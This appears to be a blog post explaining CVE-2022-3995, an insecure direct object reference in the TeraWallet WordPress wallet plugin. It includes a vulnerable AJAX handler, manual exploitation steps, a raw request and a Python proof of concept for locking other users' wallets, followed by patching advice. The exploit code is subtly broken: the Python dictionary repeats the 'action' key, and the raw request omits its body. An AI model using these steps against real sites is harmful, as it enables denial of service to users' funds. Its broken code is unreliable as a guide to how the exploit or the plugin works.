If you’ve ever run an e-commerce WordPress site, you might have used TeraWallet – a popular wallet plugin. But did you know that versions up to 1.4.3 had a serious security flaw? CVE-2022-3995 details an Insecure Direct Object Reference (IDOR) vulnerability that could let even the lowest-level logged-in users tinker with other people’s wallet settings. Let’s break down what happened, how it works, real-world risks, and how to stay safe.

What is CVE-2022-3995?

CVE-2022-3995 is a vulnerability found in TeraWallet – WooCommerce Wallet plugin for WordPress, up to version 1.4.3. The flaw happens in the way it handles the lock_unlock_terawallet AJAX action: it doesn’t properly check that the user making the request owns the wallet being locked or unlocked. Instead, it merely trusts the user-supplied “key”.

What does this mean?

Any authenticated user (even subscribers – the lowest default WordPress role) can arbitrarily lock or unlock any other user’s wallet just by knowing (or guessing) their user ID.

Why Does This Happen?

The vulnerability arises from insufficient validation of user inputs. The server-side code behind the AJAX action does not check if the wallet is owned by the user performing the action. Instead, it lets the client (browser) tell it which wallet to lock or unlock.

Think of it this way: imagine a bank teller who lets anybody say, “Lock account #12345,” and then locks it without asking if you own the account. That’s essentially what this bug allowed!

Here’s a simplified version of the problematic code (for illustration)

// This is what the AJAX handler may have looked like
add_action('wp_ajax_lock_unlock_terawallet', 'lock_unlock_terawallet_handler');

function lock_unlock_terawallet_handler() {
    if (!is_user_logged_in()) {
        wp_die();
    }
    $user_id = intval($_POST['user_id']); // <-- BAD: trusts user input here!

    // Toggle wallet lock status
    update_user_meta($user_id, 'terawallet_locked', $_POST['action']);

    wp_send_json_success();
}

Notice how $user_id is taken straight from the POST data. A user could submit user_id=5 to affect someone else!

Log in as a regular user

Craft a request to lock someone else’s wallet

Use browser dev tools, Postman, or a simple script to send

`

POST /wp-admin/admin-ajax.php?action=lock_unlock_terawallet

Content-Type: application/x-www-form-urlencoded

Where user_id=2 is the target user.

3. Result: The target user’s wallet is now locked, even though only site admins should be able to do this.

Unlocking works the same way, just replace lock with unlock.

Proof of Concept (PoC) in Python

import requests

url = 'https://victim-site.com/wp-admin/admin-ajax.php';
cookies = {'wordpress_logged_in_xxx': 'your session cookie'}
data = {
    'action': 'lock_unlock_terawallet',
    'user_id': '5',  # target user
    'action': 'lock'
}
resp = requests.post(url, cookies=cookies, data=data)
print(resp.text)

References & Official Details

- Wordfence Threat Bulletin
- NIST NVD CVE-2022-3995
- TeraWallet Plugin on WordPress.org
- Patchstack Advisory

Impact and Real-World Risks

- Denial of Wallet Service: Attackers can grief users by locking their wallets, making it impossible to use funds.
- Financial Manipulation: In some cases, unlocking wallets may expose users to withdrawals they didn’t intend.

How To Fix It

Upgrade Immediately:  
The plugin developers patched this flaw after version 1.4.3. Update to the latest version from WordPress.org.

Proper Security Checks:  
If you develop plugins, always check if the current user has permission to alter data for the targeted object. For TeraWallet, this means verifying that the $user_id in the request matches the logged-in user (or a very privileged role):

// Secure version: only allow users to lock/unlock their own wallet
$user_id = get_current_user_id();

Or, check for specific capabilities

if ($user_id != get_current_user_id() && !current_user_can('manage_woocommerce')) {
    wp_die('Unauthorized');
}

Conclusion

CVE-2022-3995 is a great example of why validating user input and enforcing permissions is critical, even with AJAX handlers. Always assume users will try to access data they shouldn’t, and never blindly trust IDs coming from the client.

Stay secure:  
If you use TeraWallet, upgrade now. If you build WordPress plugins, be paranoid – verify everything.


Share this with friends and colleagues – let’s keep our e-commerce sites safe from simple but severe vulnerabilities.


*Written and researched exclusively for you. Links to authoritative sources included. For questions or feedback, reach out any time!*

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 19:56:00 UTC